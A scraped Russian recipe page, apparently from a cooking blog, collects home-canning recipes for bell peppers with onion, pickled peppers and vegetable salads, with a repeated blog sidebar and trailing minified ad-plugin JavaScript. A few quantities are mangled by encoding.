0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Болгарский перец с луком на зиму

Болгарский перец с луком на зиму

Подготовьте стерилизованные емкости, влейте готовое блюдо. Огонь уменьшите, но не выключайте вовсе, пока не закатаете все баночки. Переверните вверх ногами, закутайте в одеяло, чтобы они медленно остыли. Благодаря этому будет происходить дополнительная стерилизация.

Перец с луком на зиму

— перчик – 3 кг
— кориандр – столовая ложка
— соль – половина стакана
— лук-шалот – 2 шт.
— сахарный песок – 4 ст.
— вода – 8 ст.
— винный уксус – 8 ст.
— морковка – 2 шт.
— семена горчицы и укропа – по столовой ложечке
— черный перчик горошком – 1 ст. л.
— свежий укроп
— тмин – 1 ст. л.

Овощи почистите и вымойте. Лучок и морковку покрошите кольцами. Если перчины вам попались крупные, разрежьте их на более мелкие части. В кастрюльку насыпьте все специи, обжарьте их несколько минут, пока они не станут издавать сильный аромат. Влейте уксус, воду, добавьте соль и сахарок. Все размешайте. Как только сахарные гранулы полностью растворятся, выключите плиту, дайте заливке немного настояться. Если вы будете хранить заготовку на полке холодильника, то прибегать к стерилизации не нужно. Если для хранения вы выберете другое место – стерилизация необходима. В емкости выложите плоды, сверху положите веточки свежей зелени. Залейте маринадом, закупорьте, после охлаждения перенесите их в прохладное место для хранения.

Перец с луком на зиму.

— болгарский перчик – 1 кг
— луковица – 3 шт.
— сахарок – 2 ст. ложки
— томатный сок – 255 г
— масло подсолнечное – 55 мл
— соль – столовая ложка
— перец горошком, лавровый лист – по 2 шт.

Перчины вымойте, очистите от семечек, покрошите ломтиками. Очистите луковицы, покрошите полукольцами. В кастрюлю налейте томатный сок, влейте уксусную кислоту, маслице. Посолите, добавьте лаврушку, сахар, специи. Массу закипятите. Добавьте овощи, перемешайте, поварите 15 минут. Снимите с плиты, переложите в стерилизованные баночки. После закатки переверните и в таком виде охладите.

Перец с луком на зиму.

Емкости сполосните кипятком либо простерилизуйте. Крышечки ополосните в кипятке. На дно положите лаврушку, укроп, специи по вкусу. Луковицу нарежьте колечками, выложите на самое донышко. Выложите часть помидоров. Перчик покрошите кольцами, заполните пустоты между помидорами. Добавьте еще лучка. Баночку установите на нож либо металлическую поставку. Вскипятите водичку, залейте. Прикройте крышками, оставьте на десять минуток. Слейте жидкость, доведите до закипания. Пока кипит вода с уксусом, добавьте ? ст. л. соли и 2,5 ложки сахарного песка. Долейте кипяток, закатайте. Переверните емкости, укутайте теплыми вещами. Спустя пару дней опустите их в погреб.

2 кг сладких перчин помойте, натрите растительным маслом, запеките в духовке до мягкости. Горький перчик очистите от кожуры, вырежьте плодоножки и семечки, перекрутите на мясорубке. Ошпарьте 3 помидора, освободите от шкурок, также перекрутите на мясорубке. Пару очищенных морковок и корень петрушки измельчите, поджарьте до мягкости на растительном масле. Отдельно поджарьте 3 очищенные луковицы. Смешайте все овощи, добавьте специи. Посолите. Поставьте на слабый огонь, проварите полчаса. Прокалите подсолнечное масло, слегка остудите, добавьте к икре, размешайте, влейте 2 ст. л. уксусной кислоты, снова помешайте. Массу перелейте в стерильные банки, тут же закатайте.

Салат «Все по 10».

Вымойте по 10 баклажан, сладкого перчика, помидоров, луковиц, нарежьте произвольно. При желании у томатов можно снять кожуру. Из 100 мл уксуса и 200 г маслица растительного, 3 ст. ложек сахара и 1.5 ст. ложки соли приготовьте маринад, вскипятите, опустите овощи, варите 30 минут. За пять минут до конца варки добавьте измельченный чеснок, петрушку, размешайте, расфасуйте по простерилизованным банкам, укупорьте.

Вымойте 3 кг болгарского перчика, вырежьте семечки и плодоножки. Плоды при этом должны остаться целыми. Промойте их снова, обдайте кипятком, оставьте для стекания воды. Нашинкуйте 1 кг моркови, 720 г лучка, 1 кг капусты, потушите на масле до получения мягкости. Приправьте специями и солью. Нафаршируйте плоды овощной массой, выложите плотными рядами в емкости. Залейте маринадом, приготовленным из 3 л. томатного сока, по столовой ложке растительного масла, уксуса и сахара. После получасовой стерилизации укупорьте.

7 оригинальных рецептов консервирования перца на зиму. Удивите родных!

Добавление статьи в новую подборку

Пожалуй, самый надежный способ сохранения перца на зиму – это консервирование. Домашнее консервирование перца – дело не такое уж хлопотное, как кажется. Убедитесь в этом, прочитав нашу статью с подборкой интересных, вкусных и несложных рецептов заготовки перца.

Чтобы сделать вкусные заготовки перца, важно выбрать подходящие для этого сорта. Для консервирования выбирайте целые плоды с плотной кожицей, без признаков порчи. Предварительно вымытый и обсушенный перец можно порезать ломтиками, колечками или кубиками – так легче будет укладывать его в банку. Для придания маринованному перцу дополнительного вкуса и аромата используйте различные специи и пряности.

Маринованный острый перец

Консервированный острый перец можно использовать как ингредиент для приготовления соусов, салатов, закусок. Для уменьшения горечи добавьте в маринад больше сахара.

Вам понадобятся: 1 кг острого перца (чили, халапеньо), 1 зубчик чеснока, 1-3 ст.л. сахара, 1 ст.л. соли, 150 мл 9%-ного уксуса, 1 ст. воды.

Приготовление. Используя перчатки, нарежьте перец тонкими колечками и промойте под холодной водой. В кастрюле смешайте воду, уксус, сахар, соль и измельченный чеснок. Доведите до кипения, снимите кастрюлю с огня и положите перец. Дайте постоять 15 минут, затем выложите перец в стерилизованную банку, залейте маринадом, простерилизуйте и закатайте.

Маринованный сладкий перец

Этот рецепт придется по душе любителям пряных сладких заготовок. Из сладкого маринованного перца получается отличная закуска.

Вам понадобятся: 500 г сладкого перца, 3 луковицы, 2 зубчика чеснока, 6 ст.л. сахара, 1,5 ст. л. соли, 1/2 ч.л. молотой паприки, 1,5 ст. винного уксуса, 1/2 ст. воды.

Приготовление. Перец нарежьте тонкими брусочками, лук – кольцами и уложите все в банку. В кастрюле смешайте воду, уксус, сахар, соль, паприку и измельченный чеснок, доведите до кипения. Залейте маринадом перец, простерилизуйте и закатайте. Такую заготовку также можно хранить в холодильнике 1-2 месяца, просто закупорив крышкой.

Перец, маринованный с растительным маслом

Благодаря маслу маринованный перец получается мягче и нежнее.

Вам понадобится: 1 кг перца, 1 луковица, 8 зубчиков чеснока, 20 ст.л. сахара, 2 ч.л. соли, 4 ст.л. растительного масла, 1 ст. 9%-ного уксуса, 4 ст. воды.

Приготовление. Перец очистите от семян и перегородок и нарежьте ломтиками. Уложите в чистые банки вместе с порезанным полукольцами луком и зубчиками чеснока. Разлейте по банкам масло. Для маринада смешайте воду, уксус, сахар и соль и доведите до кипения. Залейте перец горячим маринадом, простерилизуйте и закатайте.

Маринованный перец с луком

Лук придает маринованную перцу легкую остроту и неповторимый вкус.

Вам понадобятся: 1,5 кг перца, 1/2 кг лука, 1 ст. сахара, 2 ст.л. соли, 15 ст.л. растительного масла, 13 ст.л. 9%-ного уксуса, 1,5 л воды.

Приготовление. Сначала приготовьте маринад, смешав воду, уксус, масло, соль и сахар, доведите все до кипения. Положите в него нарезанные овощи и поварите 5 минут, затем разложите в стерилизованные банки, залейте маринадом и закатайте.

Перец маринованный быстрого приготовления

Приготовив маринованный перец по этому рецепту, можно приступать к дегустации уже на следующий день.

Вам понадобятся: 1/2 кг болгарских перцев, 2 луковицы, 2 зубчика чеснока, 1/2 ч.л. молотой паприки, веточки тимьяна по желанию, 8 ст.л. сахара, 1 ст. яблочного уксуса, 1,5 ст. воды.

Приготовление. Смешайте воду, уксус, сахар и паприку, доведите до кипения и снимите с огня. Перец нарежьте тонкими ломтиками, лук – полукольцами, чеснок измельчите и положите в маринад. По желанию добавьте пару веточек свежего тимьяна. Перемешайте и дайте постоять минимум 2 часа, затем уберите в холодильник на 6 часов.

Пикантный маринованный перец

Эту пикантность маринованному перцу придают пряности – корица, гвоздика, перец.

Вам понадобятся: 2 кг болгарского перца, лавровый лист, черный и душистый перец горошком, гвоздика по вкусу, 1,5 ч.л. молотой корицы, 1/2 ст. сахара, 1 ст.л. соли, 1/2 ст. растительного масла, 1/2 ст. 9%-ного уксуса, вода.

Приготовление. Для маринада смешайте масло со специями, солью и сахаром и доведите до кипения на медленном огне, постоянно помешивая. Влейте уксус и хорошо перемешайте. Перец нарежьте ломтиками и опустите в кипящую воду на 5 минут. Отбросьте на дуршлаг и переложите перец в маринад, потомите 5 минут. Затем разложите перец по стерилизованным банкам, залейте маринадом, закупорьте крышками, остудите, перевернув банки вверх дном и храните в темном прохладном месте.

Маринованный перец для фарширования

Отличная заготовка, которая придется весьма кстати зимой, когда вы захотите приготовить фаршированный перец.

Вам понадобятся: 1 кг перца, 1 ст.л. сахара, 2 ст.л. соли, 3 ст.л. 9%-ного уксуса, 1,5 л воды.

Приготовление. У перцев аккуратно вырежьте плодоножку, удалите семена и перегородки. Затем опустите стручки в кипящую воду и бланшируйте в течение 5 минут. Извлеките перец шумовкой, обсушите и уложите в банки. Отмерьте 1,5 л воды, в которой бланшировался перец, добавьте соль, сахар и доведите до кипения. В банки с перцем разлейте уксус и залейте горячим маринадом. Закатайте и остудите, перевернув вверх дном.

Надеемся, наши несложные рецепты консервированного перца придутся вам по вкусу и вы обязательно что-нибудь приготовите!

LiveInternetLiveInternet

Метки

Новости

Ссылки

Музыка

Рубрики

  • без выпечки вкусно (366)
  • беляш (38)
  • блины (324)
  • блюда из кефира (114)
  • Блюда из консервы рыбной (116)
  • блюда из яиц (134)
  • бутерброды (74)
  • вареники и не только (137)
  • видео и фото интересно (205)
  • видио рецепты (122)
  • выпечка (1833)
  • не сладкая (182)
  • гарнир (289)
  • горшочки (86)
  • грибы (275)
  • дача (567)
  • вредители прфилактика (42)
  • комнатные цветы (45)
  • подкормка рассады (28)
  • полезности (168)
  • хранение (4)
  • десерт (534)
  • детишки (81)
  • детское питание (44)
  • дневник и настройки для компьютера (441)
  • еда разное (444)
  • завтрак (82)
  • заготовки (1447)
  • аджика (50)
  • арбузы (10)
  • варенье (75)
  • кабачки (39)
  • капуста (5)
  • кетчуп (27)
  • огурцы (87)
  • перец (60)
  • помидоры (108)
  • салат (77)
  • синенькие (97)
  • фасоь (14)
  • фрукты (7)
  • закуски (1006)
  • запеканки (460)
  • рыбная (8)
  • здоровье (3340)
  • глаза (19)
  • голова (27)
  • желудок (12)
  • желчный (4)
  • женщинам (29)
  • мази (32)
  • настойки .элексиры (97)
  • ноги (81)
  • печень (30)
  • поджелудочная (15)
  • почки (13)
  • простуда (138)
  • руки (5)
  • сердце (17)
  • спина (18)
  • суставы (38)
  • УШИ И НОС (3)
  • цистит (3)
  • щитовидка (41)
  • из курицы (1282)
  • интересно (1229)
  • кабачки (262)
  • картошка (623)
  • кексы и рулеты (934)
  • книги рецептов (43)
  • коктели (96)
  • конфеты (307)
  • красота (1827)
  • волосы (179)
  • лицо (279)
  • ногти (41)
  • пяточки (39)
  • кремы (238)
  • кухня мира (255)
  • микроволновка и не только (177)
  • море продукты (241)
  • музыка (100)
  • мультики (81)
  • мясные блюда (1397)
  • кролик (15)
  • напитки (631)
  • новогодние рецепты (157)
  • овощные (688)
  • оладки (117)
  • открытки и др (335)
  • пароварка (1)
  • паштеты (129)
  • печень (242)
  • печенье (743)
  • пироги (1823)
  • начинка (3)
  • пицца (301)
  • плов (31)
  • полезное (1124)
  • выведение пятин (34)
  • дом помощь (189)
  • помощь в кулинарии (83)
  • стирка (21)
  • уборка (18)
  • диетическое (136)
  • постное меню (123)
  • праздничное (382)
  • куличи (98)
  • салаты (25)
  • рамочки (133)
  • РУКОДЕЛИЕ (108)
  • рыбные блюда (1220)
  • жарим (309)
  • посол рыбы (108)
  • с орехами (66)
  • салаты (1698)
  • с грибами (131)
  • с языком (17)
  • синенькие (276)
  • соусы и маринады (301)
  • суп первое (373)
  • сырные (324)
  • творог (743)
  • тесто (342)
  • торты (1600)
  • украшения и еда (160)
  • фильмы (173)
  • фотошоп (126)
  • фруктовые рецепты (78)
  • халва (1)
  • хобби (1179)
  • стихи (59)
  • худеем (648)
  • чебуреки (88)
  • шашлык (203)
  • шоколад и блюда (279)
  • шпроты (10)

Цитатник

Когда увидела такой рецепт впервые вначале улыбнулась, затем решила приготовить Уж очень назван.

Торт «Милка». Очень нежный и тающий во рту! для бисквита: ● 4 яйца ● 4 столов.

Сегодня готовлю потрясающе вкусное блюдо к празднику. Сочные ароматные пирожки в виде тюльпанов.

Вкусный и простой салат “Виолетта” хоть на праздник, хоть на каждый день. Этот р.

У «Со Вкусом» для вас прекрасная идея праздничного блюда. Оказывается, популярнейшее «Рождествен.

Поиск по дневнику

Подписка по e-mail

Статистика

Заготовки из болгарского перца — 30 рецептов с фото

Четверг, 03 Сентября 2015 г. 17:52 + в цитатник

Приготовим болгарский овощной салат манжо на зиму.

Для любителей баклажанов рекомендую шикарный овощной салат на зиму.

Аджику я делаю очень острую. Салат этот тоже очень острый, но, не смотря на это, съедается очень быстро. Даже детям он нравится.

Классическое блюдо венгерской кухни. Рецепт лечо на зиму. Входит в мою обязательную программу домашнего консервирования.

Отличная овощная закуска, простой бюджетный рецепт икры «краснодарской». Заготовка готовится из кабачков с помидорами, сладким перцем, морковью, луком и чесноком. Этот же рецепт икры «краснодарской» можно использовать не только для кабачков, но для патиссонов, лагенарии, баклажанов.

Рецепт этого перца был переписан у сотрудницы на работе лет 25 назад. С тех пор было опробовано еще несколько рецептов, но большую часть перца на зиму закрываю так.

Это простой и вкусный салат на зиму. Отличное сочетание баклажанов и овощей дают превосходный результат. А еще прелесть этого рецепта в том, что можно закатывать этот салат из баклажанов на зиму маленькими порциями.

Кабачковая икра — очень хорошая закуска зимой, и не только зимой! Я обжаривала все отдельно, за счет этого получается очень вкусная икра.

Как думаете, пора делать запасы на зиму? Я уже начала. Готовлю овощное рагу на зиму, рецепт с баклажанами и кабачками мне особенно нравится. Законсервируем лето на потом?:)

Яркий и вкусный салат на зиму.

Зима не за горами. Заготовим про запас вкусные жареные баклажаны.

В сезон осенних заготовок вам пригодится этот рецепт для домашнего консервирования. Икра из перца с луком и помидорами — это вкусная овощная закуска и отличное дополнение к мясным блюдам или картофелю.

Лечо из болгарского перца, пожалуй, самое популярное консервированное блюдо из этого овоща. Консервация лечо на зиму не представляет никакой сложности, главное, собрать все необходимые продукты в одном месте в одно время.

Одна из любимейших мной закусок, которая круглый год присутствует на праздничном столе моей тетушки Марии. Совсем недавно тетушка любезно поделилась рецептом приготовления этих перцев, а чтобы я не откладывал их приготовление в долгий ящик, снабдила и перцами.

Рецепт приготовления на зиму вкусного салата ассорти с баклажаном, сладким перцем и помидорами.

Вы, конечно же, делаете заготовки на зиму из сладкого перца? Это рецепт салата лечо из старого блокнота моей мамы. Рекомендую. Просто, вкусно, полезно.

Помидоры в желе на зиму можно заготовить даже из крупных плодов, тех, что не помещаются в обыкновенную трехлитровую банку, потому что мы будем их разрезать на небольшие дольки. Добавим к ним лучок и перчик, заправим маринадом и к зиме получим отличную закуску.

Заготовка баклажанов на зиму. Овощной салат из консервированных баклажанов, перца, помидоров, моркови и лука.

Зимний салат «Десятка» — рецепт приготовления домашней овощной заготовки из баклажанов, сладкого перца, помидоров и лука. Почему салат «Десятка» (или салат «Десяточка») получил такое название, вы легко догадаетесь, взглянув на список ингредиентов. Овощной салат “Десятка”- это витаминный запас на зиму, замечательная готовая закуска, которая всегда под рукой, и прекрасный гарнир к мясным блюдам.

LiveInternetLiveInternet

Метки

Новости

Ссылки

Музыка

Рубрики

  • без выпечки вкусно (366)
  • беляш (38)
  • блины (324)
  • блюда из кефира (114)
  • Блюда из консервы рыбной (116)
  • блюда из яиц (134)
  • бутерброды (74)
  • вареники и не только (137)
  • видео и фото интересно (205)
  • видио рецепты (122)
  • выпечка (1833)
  • не сладкая (182)
  • гарнир (289)
  • горшочки (86)
  • грибы (275)
  • дача (567)
  • вредители прфилактика (42)
  • комнатные цветы (45)
  • подкормка рассады (28)
  • полезности (168)
  • хранение (4)
  • десерт (534)
  • детишки (81)
  • детское питание (44)
  • дневник и настройки для компьютера (441)
  • еда разное (444)
  • завтрак (82)
  • заготовки (1447)
  • аджика (50)
  • арбузы (10)
  • варенье (75)
  • кабачки (39)
  • капуста (5)
  • кетчуп (27)
  • огурцы (87)
  • перец (60)
  • помидоры (108)
  • салат (77)
  • синенькие (97)
  • фасоь (14)
  • фрукты (7)
  • закуски (1006)
  • запеканки (460)
  • рыбная (8)
  • здоровье (3340)
  • глаза (19)
  • голова (27)
  • желудок (12)
  • желчный (4)
  • женщинам (29)
  • мази (32)
  • настойки .элексиры (97)
  • ноги (81)
  • печень (30)
  • поджелудочная (15)
  • почки (13)
  • простуда (138)
  • руки (5)
  • сердце (17)
  • спина (18)
  • суставы (38)
  • УШИ И НОС (3)
  • цистит (3)
  • щитовидка (41)
  • из курицы (1282)
  • интересно (1229)
  • кабачки (262)
  • картошка (623)
  • кексы и рулеты (934)
  • книги рецептов (43)
  • коктели (96)
  • конфеты (307)
  • красота (1827)
  • волосы (179)
  • лицо (279)
  • ногти (41)
  • пяточки (39)
  • кремы (238)
  • кухня мира (255)
  • микроволновка и не только (177)
  • море продукты (241)
  • музыка (100)
  • мультики (81)
  • мясные блюда (1397)
  • кролик (15)
  • напитки (631)
  • новогодние рецепты (157)
  • овощные (688)
  • оладки (117)
  • открытки и др (335)
  • пароварка (1)
  • паштеты (129)
  • печень (242)
  • печенье (743)
  • пироги (1823)
  • начинка (3)
  • пицца (301)
  • плов (31)
  • полезное (1124)
  • выведение пятин (34)
  • дом помощь (189)
  • помощь в кулинарии (83)
  • стирка (21)
  • уборка (18)
  • диетическое (136)
  • постное меню (123)
  • праздничное (382)
  • куличи (98)
  • салаты (25)
  • рамочки (133)
  • РУКОДЕЛИЕ (108)
  • рыбные блюда (1220)
  • жарим (309)
  • посол рыбы (108)
  • с орехами (66)
  • салаты (1698)
  • с грибами (131)
  • с языком (17)
  • синенькие (276)
  • соусы и маринады (301)
  • суп первое (373)
  • сырные (324)
  • творог (743)
  • тесто (342)
  • торты (1600)
  • украшения и еда (160)
  • фильмы (173)
  • фотошоп (126)
  • фруктовые рецепты (78)
  • халва (1)
  • хобби (1179)
  • стихи (59)
  • худеем (648)
  • чебуреки (88)
  • шашлык (203)
  • шоколад и блюда (279)
  • шпроты (10)

Цитатник

Когда увидела такой рецепт впервые вначале улыбнулась, затем решила приготовить Уж очень назван.

Торт «Милка». Очень нежный и тающий во рту! для бисквита: ● 4 яйца ● 4 столов.

Сегодня готовлю потрясающе вкусное блюдо к празднику. Сочные ароматные пирожки в виде тюльпанов.

Вкусный и простой салат “Виолетта” хоть на праздник, хоть на каждый день. Этот р.

У «Со Вкусом» для вас прекрасная идея праздничного блюда. Оказывается, популярнейшее «Рождествен.

Поиск по дневнику

Подписка по e-mail

Статистика

Заготовки из болгарского перца — 30 рецептов с фото

Четверг, 03 Сентября 2015 г. 17:52 + в цитатник

Приготовим болгарский овощной салат манжо на зиму.

Для любителей баклажанов рекомендую шикарный овощной салат на зиму.

Аджику я делаю очень острую. Салат этот тоже очень острый, но, не смотря на это, съедается очень быстро. Даже детям он нравится.

Классическое блюдо венгерской кухни. Рецепт лечо на зиму. Входит в мою обязательную программу домашнего консервирования.

Отличная овощная закуска, простой бюджетный рецепт икры «краснодарской». Заготовка готовится из кабачков с помидорами, сладким перцем, морковью, луком и чесноком. Этот же рецепт икры «краснодарской» можно использовать не только для кабачков, но для патиссонов, лагенарии, баклажанов.

Рецепт этого перца был переписан у сотрудницы на работе лет 25 назад. С тех пор было опробовано еще несколько рецептов, но большую часть перца на зиму закрываю так.

Это простой и вкусный салат на зиму. Отличное сочетание баклажанов и овощей дают превосходный результат. А еще прелесть этого рецепта в том, что можно закатывать этот салат из баклажанов на зиму маленькими порциями.

Кабачковая икра — очень хорошая закуска зимой, и не только зимой! Я обжаривала все отдельно, за счет этого получается очень вкусная икра.

Как думаете, пора делать запасы на зиму? Я уже начала. Готовлю овощное рагу на зиму, рецепт с баклажанами и кабачками мне особенно нравится. Законсервируем лето на потом?:)

Яркий и вкусный салат на зиму.

Зима не за горами. Заготовим про запас вкусные жареные баклажаны.

В сезон осенних заготовок вам пригодится этот рецепт для домашнего консервирования. Икра из перца с луком и помидорами — это вкусная овощная закуска и отличное дополнение к мясным блюдам или картофелю.

Лечо из болгарского перца, пожалуй, самое популярное консервированное блюдо из этого овоща. Консервация лечо на зиму не представляет никакой сложности, главное, собрать все необходимые продукты в одном месте в одно время.

Одна из любимейших мной закусок, которая круглый год присутствует на праздничном столе моей тетушки Марии. Совсем недавно тетушка любезно поделилась рецептом приготовления этих перцев, а чтобы я не откладывал их приготовление в долгий ящик, снабдила и перцами.

Рецепт приготовления на зиму вкусного салата ассорти с баклажаном, сладким перцем и помидорами.

Вы, конечно же, делаете заготовки на зиму из сладкого перца? Это рецепт салата лечо из старого блокнота моей мамы. Рекомендую. Просто, вкусно, полезно.

Помидоры в желе на зиму можно заготовить даже из крупных плодов, тех, что не помещаются в обыкновенную трехлитровую банку, потому что мы будем их разрезать на небольшие дольки. Добавим к ним лучок и перчик, заправим маринадом и к зиме получим отличную закуску.

Заготовка баклажанов на зиму. Овощной салат из консервированных баклажанов, перца, помидоров, моркови и лука.

Зимний салат «Десятка» — рецепт приготовления домашней овощной заготовки из баклажанов, сладкого перца, помидоров и лука. Почему салат «Десятка» (или салат «Десяточка») получил такое название, вы легко догадаетесь, взглянув на список ингредиентов. Овощной салат “Десятка”- это витаминный запас на зиму, замечательная готовая закуска, которая всегда под рукой, и прекрасный гарнир к мясным блюдам.

Болгарский перец, фаршированный овощами на зиму

До жути люблю болгарский перец во всех его проявлениях. Раньше всегда делали с мамой такой перчик, потом со временем появились всякие новые заготовки и мы про него забыли. Недавно в гостях подали на стол соления, среди которых и был фаршированный перец луком и морковкой, я практически одна баночку съела.. не могла остановиться. Начался сезон заготовок, я конечно же вспомнила и кинулась искать рецепт на любимом Поваренке, но увы.. в такой вариации не нашла.. есть подобный но только с капустой.

Ингредиенты для «Болгарский перец, фаршированный овощами на зиму»:

  • Сок томатный (У меня из домашних помидоров) — 1,5 л
  • Перец болгарский (Некрупные плоды. Я делаю в маленькие (0,5-0,7) банки на 1 раз, примерно 4-5 перцев на 1 банку) — 1 кг
  • Лук репчатый — 500 г
  • Морковь — 500 г
  • Чеснок (по вкусу) — 5 зуб.
  • Масло растительное (0,5 стакана на обжарку лука с морковью,остальное в заливку. Можно чуть поменьше) — 1,5 стак.
  • Соль (без горки. По вкусу) — 2 ст. л.
  • Сахар (по вкусу) — 23 стак.
  • Уксусная эссенция (по вкусу) — 1 ст. л.
  • Специи (по вкусу. Лавровый лист, гвоздика, душистый перец)

Время приготовления: 90 минут

Количество порций: 4

Рецепт «Болгарский перец, фаршированный овощами на зиму»:

Лук, морковь чистим. Лук нарезаем кубиком, морковь на мелкую терку.

Обжариваем на растительном масле.

Перец очищаем от семян и перегородок, промываем и выкладываем на полотенце что бы стекла вода.

Помидоры прокручиваем, у меня это выполняет кухонный комбайн, этот шаг я пропустила, т. к. сок заготовила еще с утра, так как делала еще лечо. Не обращайте внимание на цвет моей заливки, у меня основная масса помидор были желтые, оранжевые и совсем немного красных.. Ставим кастрюлю с соком на огонь, но не ждем пока закипит, иначе когда будете складывать перчики есть вероятность ошпариться. Плотно набиваем каждый перчик начинкой из лука и моркови, но без фанатизма что бы перчик не сломался и складываем их в кастрюлю с соком. Кипятим 25-30 минут. Я Сначала перчики ставила в кастрюлю что бы поместились все, но потом по мере того как перчики станут мягкими стараюсь немного их притопить, а в те которые торчат ложкой во внутрь заливаю понемногу маринада, т. к. лук и морковь я не солила. Добавляем соль, сахар, масло и уксус. Перемешиваем по мере возможности и пробуем на вкус ( Я всегда любые маринады и рассолы пробую на вкус и подгоняю под себя понемногу добавляя сахар, соль или уксус). Я люблю в маринадах вкус специй и кидаю их прямо в кастрюлю, если не любите можно завернуть в марлечку и опустить их в маринад, потом по готовности блюда просто вытащить этот мешочек. При раскладке я выбрасываю только лаврушку. У меня осталось пара ложек начинки я закинула ее в заливку, мы любим густой соус. Когда практически все готово, я пропускаю через пресс чеснок, для тех то чеснок не любит этот шаг можно пропустить. Выключаем огонь.

Раскладываем перчики в горячие стерильные банки. Я всю свою жизнь стерилизую банки в духовке, застелив решетку салфетками, при 100 градусах минут 20-25. Крышки просто кипячу 3-5 минут. Ни разу ничего не портилось и не взрывалось.

Укутываем баночки в шубу, предварительно перевернув, примерно на сутки, или как остынет. У меня они по соседству с предыдущей партией лечо с кабачками. Затем отправляем в погреб или холодильник, либо другое прохладное место.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
